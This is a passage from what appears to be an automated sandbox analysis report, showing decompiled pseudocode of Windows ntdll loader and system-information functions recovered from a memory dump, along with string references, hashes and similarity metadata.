							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E02A98999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E02A98999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x2b75c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x2b75c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E02AA2280(_t92, 0x2b786cc);
															_t94 = E02B59DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E02AB61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x2b75c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E02A98A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x2b75c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x2b75c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E02ACF380(_t136, 0x2a61184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E02AA2280(_t108, 0x2b786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E02AB61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E02B59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E02A9FFB0(_t118, _t156, 0x2b786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E02AC9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x02a98799
0x02a9879d
0x02a987a1
0x02a987a3
0x02a987a8
0x02a987c3
0x02a987c3
0x02a987c8
0x02a987d1
0x02a987d4
0x02a987d8
0x02a987e5
0x02a987ec
0x02ae9bfe
0x02ae9c00
0x02ae9c02
0x02ae9c08
0x02ae9c0d
0x02ae9c0f
0x02ae9c14
0x02ae9c2d
0x02ae9c32
0x02ae9c37
0x02ae9c3a
0x02ae9c3c
0x02ae9c42
0x02ae9c42
0x02ae9c3c
0x02ae9c02
0x02a987da
0x02a987df
0x02a987e3
0x00000000
0x00000000
0x02a987e3
0x02a987f2
0x00000000
0x02a987fb
0x02a987fd
0x02a987fe
0x02a9880e
0x02a9880f
0x02a98810
0x02a98814
0x02a9881a
0x02a9881c
0x02a9881f
0x02a98821
0x02a98822
0x02a98824
0x02a98826
0x02a9882c
0x02a9882e
0x02ae9c48
0x02ae9c48
0x02a98834
0x02a98834
0x02a98837
0x00000000
0x00000000
0x02a98837
0x02a9882e
0x02a9883d
0x02a98840
0x02a98843
0x02a98846
0x02a98849
0x02a9884c
0x02a9884e
0x02a98850
0x02a98852
0x02a98854
0x02a98857
0x02a988b4
0x02a988b6
0x02a988b6
0x02a98859
0x02a98859
0x02a98859
0x02a98861
0x02a98866
0x02a9886a
0x02a9893d
0x02a98941
0x00000000
0x02a98947
0x02a98947
0x02a9894a
0x02a9894c
0x00000000
0x02a98952
0x02a98955
0x02a9895a
0x02a9895d
0x02a9895d
0x02a9895f
0x02a98961
0x02a98961
0x02a98968
0x00000000
0x00000000
0x02a9896a
0x02a9896b
0x02a9896e
0x00000000
0x02a98970
0x02a98970
0x02a98970
0x02a98970
0x02a98972
0x02a98972
0x02a98974
0x00000000
0x02a9897a
0x02a9897a
0x02a9897d
0x00000000
0x02a98983
0x02ae9c65
0x02ae9c6d
0x02ae9c72
0x02ae9c75
0x02ae9c75
0x02ae9c82
0x02ae9c86
0x02ae9c87
0x02ae9c88
0x02ae9c89
0x02ae9c8c
0x02ae9c90
0x02ae9c95
0x02ae9c97
0x02ae9ca0
0x02ae9ca3
0x02ae9ca9
0x02ae9ca9
0x00000000
0x02ae9ca9
0x02ae9ca3
0x00000000
0x02ae9c97
0x02a9897d
0x00000000
0x02a98974
0x02a98988
0x02a98992
0x02a98996
0x00000000
0x02a98996
0x02a9894c
0x00000000
0x02a98870
0x02a9887b
0x02a9887d
0x02a9887f
0x02a98881
0x02a98884
0x02a98884
0x02a98886
0x02a98889
0x02a9888c
0x02a9888e
0x02a98891
0x02a98891
0x02a98898
0x00000000
0x00000000
0x02a9889a
0x02a9889b
0x02a9889e
0x00000000
0x00000000
0x02a988a0
0x02a988a8
0x02a988b0
0x02a988b2
0x02a988d3
0x02a988d5
0x00000000
0x02a988d7
0x02a988db
0x02a988dc
0x02a988e0
0x02a988e8
0x02a988ee
0x02a988f0
0x02a988f3
0x02a988fc
0x02a98901
0x02a98906
0x02a9890c
0x02a9890c
0x02a9890f
0x02a98916
0x02a98917
0x02a98918
0x02a98919
0x02a9891a
0x02a9891f
0x02a98921
0x02ae9c52
0x02ae9c55
0x02ae9c5b
0x02ae9cac
0x02ae9cc0
0x02ae9cc0
0x02ae9c55
0x02a98927
0x02a98927
0x02a9892f
0x02a98933
0x00000000
0x02a988f5
0x02a988f5
0x00000000
0x02a988f7
0x02a988f7
0x02a988fa
0x00000000
0x00000000
0x00000000
0x00000000
0x02a988fa
0x02a988f5
0x02a988f3
0x00000000
0x02a988d5
0x00000000
0x02a988b2
0x02a988c9
0x00000000
0x02a988c9
0x02a9887f
0x02a9886a
0x02a98857
0x02a98852
0x02a988bf
0x02a988bf
0x02a987aa
0x02a987ad
0x02a987ae
0x02a987b4
0x02a987b5
0x02a987b6
0x02a987b8
0x02a987bd
0x02a987c1
0x02a987f4
0x02a987fa
0x00000000
0x00000000
0x00000000
0x02a987c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 02AE9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02AE9C18
LdrpDoPostSnapWork, xrefs: 02AE9C1E

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 234de6a54165123a3a78f0a0e68564f52ca2ecc292d4dff7dbdfa90bd7793189
Instruction ID: 0c50842ea247d9d9f0dd4084aaf875d4dae38a17586717acd0f98a44d381985b
Opcode Fuzzy Hash: 234de6a54165123a3a78f0a0e68564f52ca2ecc292d4dff7dbdfa90bd7793189
Instruction Fuzzy Hash: E191F471A00216EFDF18DF5AC4C0ABAB7F6FF46354B5480A9D906AB250DF35E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A97E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E02A97E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E02A9CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E02A8C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x2b75780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E02B05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x2b75780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E02AA7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02AA7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E02B07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E02AA7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02AA7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E02B07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E02ABA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E02A8B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x02a97e4c
0x02a97e50
0x02a97e55
0x02a97e58
0x02a97e5d
0x02a97e71
0x02a97f33
0x02a97e77
0x02a97e77
0x02a97e79
0x02a97e79
0x02a97e7e
0x02a97f45
0x02ae9848
0x00000000
0x02ae9848
0x02a97f4e
0x02a97f53
0x02a97f5a
0x00000000
0x00000000
0x02ae985a
0x02ae9862
0x02ae9866
0x00000000
0x02ae986c
0x00000000
0x02ae986c
0x02a97e84
0x02a97e84
0x02a97e8d
0x02ae9871
0x02a97eb8
0x02a97ec0
0x02a97ec0
0x02a97e9a
0x02ae987e
0x00000000
0x00000000
0x02ae9884
0x02ae988b
0x02ae98a7
0x02ae98ac
0x02ae98b1
0x02ae98b6
0x02ae98b8
0x02ae98b8
0x02ae98b9
0x00000000
0x02ae98b9
0x02a97ea0
0x02a97ea7
0x00000000
0x00000000
0x02a97eac
0x02a97eb1
0x02a97ec6
0x02a97ed0
0x02ae98cc
0x02a97ed6
0x02a97ed6
0x02a97ed6
0x02a97ede
0x02a97ee3
0x02ae98e3
0x02ae98f0
0x02ae9902
0x02ae98f2
0x02ae98fb
0x02ae98fb
0x02ae9907
0x02ae991d
0x02ae991d
0x02ae9907
0x02ae98e3
0x02a97ef0
0x02a97f14
0x02a97f14
0x02a97f1e
0x02ae9946
0x02a97f24
0x02a97f24
0x02a97f24
0x02a97f2c
0x02ae996a
0x02ae9975
0x02ae9975
0x02ae997e
0x02ae9993
0x02ae9993
0x02ae997e
0x00000000
0x02a97ef2
0x02a97efc
0x02a97f0a
0x02a97f0e
0x02ae9933
0x00000000
0x02ae9933
0x00000000
0x02a97f0e
0x00000000
0x00000000
0x00000000
0x02a97eb1

Strings

LdrpCompleteMapModule, xrefs: 02AE9898
minkernel\ntdll\ldrmap.c, xrefs: 02AE98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 02AE9891

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ebc4ae2417d45138d4b84fbe876677b4ae857a612ee8010ef7f02d92eda12121
Instruction ID: 391840502cf1b4c920162a7b929f5d89ba61108d8886609b65b1611ca187b0d4
Opcode Fuzzy Hash: ebc4ae2417d45138d4b84fbe876677b4ae857a612ee8010ef7f02d92eda12121
Instruction Fuzzy Hash: C751D1716107459BEF22CB6ACD84B6ABBE9AF00714F040599E8529B7E1DF30ED01CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A8E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02A8E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E02A8F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E02AC95D0();
						}
						if(_t78 != 0) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E02ACFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E02ACBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E02AC9600();
					if(_t97 < 0) {
						goto L6;
					}
					E02ACBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L02A8F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E02ACBB40(_t83, _t102 + 0x24, _t78);
								if(L02A943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E02ACBB40(_t84, _t102 + 0x24, _t94);
									if(L02A943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x02a8e620
0x02a8e628
0x02a8e62f
0x02a8e631
0x02a8e635
0x02a8e637
0x02a8e63e
0x02ae5503
0x02ae5503
0x02a8e64c
0x02a8e64c
0x02a8e651
0x00000000
0x00000000
0x02a8e661
0x02a8e665
0x02ae542a
0x02a8e715
0x02a8e71a
0x02a8e71c
0x02a8e720
0x02a8e720
0x02a8e727
0x02a8e736
0x02a8e736
0x02a8e743
0x02a8e743
0x02a8e673
0x02a8e678
0x02a8e67d
0x02a8e682
0x02a8e685
0x02a8e692
0x02a8e69b
0x02a8e6a3
0x02a8e6ad
0x02a8e6b1
0x02a8e6b2
0x02a8e6bb
0x02a8e6bf
0x02a8e6c0
0x02a8e6c8
0x02a8e6cc
0x02a8e6d5
0x02a8e6d9
0x00000000
0x00000000
0x02a8e6e5
0x02a8e6ea
0x02a8e6f9
0x02a8e70b
0x02a8e70f
0x02ae5439
0x02ae545e
0x02ae545e
0x00000000
0x02ae545e
0x02ae543b
0x02ae543e
0x02ae5440
0x02ae5445
0x02ae5472
0x02ae5475
0x02ae548d
0x02ae5493
0x02ae54a9
0x00000000
0x00000000
0x02ae54ab
0x02ae54b4
0x02ae54bc
0x02ae54c8
0x02ae54de
0x02ae54fb
0x02ae54e0
0x02ae54e6
0x02ae54eb
0x02ae54eb
0x02ae54de
0x00000000
0x02ae54bc
0x02ae5477
0x02ae547a
0x02ae5480
0x02ae5483
0x02ae5486
0x02ae548b
0x00000000
0x00000000
0x00000000
0x02ae548b
0x00000000
0x00000000
0x00000000
0x00000000
0x02ae5447
0x02ae5447
0x02ae5447
0x02ae5447
0x02ae544e
0x00000000
0x00000000
0x02ae5450
0x02ae5452
0x02ae5455
0x02ae545a
0x00000000
0x00000000
0x00000000
0x02ae545c
0x02ae546a
0x02ae546d
0x02ae546f
0x00000000
0x02ae546f
0x02a8e70f

Strings

@, xrefs: 02A8E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02A8E68C
InstallLanguageFallback, xrefs: 02A8E6DB

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 6f560cf0be363d29715c176d8515bf3d5e7b24d79768acdc9abf79f6ba8b46a4
Instruction ID: 014d84d6e1f27ce83ea3c6fd7a282c4618df8cf5df6abab8b1e2d28fa29c3152
Opcode Fuzzy Hash: 6f560cf0be363d29715c176d8515bf3d5e7b24d79768acdc9abf79f6ba8b46a4
Instruction Fuzzy Hash: 4551A171904345DBCB14EF24D580A6BB3E9AF88718F44092EF986E7240FF34D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B051BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02B051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x2b605f0);
				E02ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E02A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E02B053CA(0);
						return E02ADD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E02ACF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E02AA3690(1, _t117, 0x2a61810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E02ACAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L02AA4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E02ACAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E02B0500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E02AC9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x02b051be
0x02b051c3
0x02b051c8
0x02b051cd
0x02b051d0
0x02b051d3
0x02b051d8
0x02b051db
0x02b051de
0x02b051e0
0x02b051e3
0x02b051e6
0x02b051e8
0x02b05342
0x02b05351
0x02b05356
0x02b0535a
0x02b05360
0x02b05363
0x02b05366
0x02b05369
0x02b05369
0x02b0536b
0x02b0536b
0x02b05370
0x02b053a3
0x02b053a4
0x02b053a6
0x02b053ab
0x02b053ab
0x02b053ae
0x02b053ae
0x02b053b5
0x02b053bf
0x02b053bf
0x02b05375
0x02b05396
0x02b053a0
0x02b053a0
0x00000000
0x02b05396
0x02b05377
0x02b05379
0x02b0537f
0x02b0538c
0x02b05390
0x00000000
0x02b05390
0x02b051ee
0x02b051f1
0x02b05301
0x02b05310
0x02b05315
0x02b05318
0x02b0531b
0x02b05320
0x02b0532e
0x02b05331
0x00000000
0x02b05331
0x02b05328
0x02b05329
0x00000000
0x02b05329
0x02b051fa
0x02b05235
0x02b05236
0x02b05239
0x02b0523f
0x02b05240
0x02b05241
0x02b05242
0x02b05246
0x02b05247
0x02b0524e
0x02b05251
0x02b05267
0x02b05269
0x02b0526e
0x02b0527d
0x02b0527e
0x02b05281
0x02b05282
0x02b05287
0x02b05288
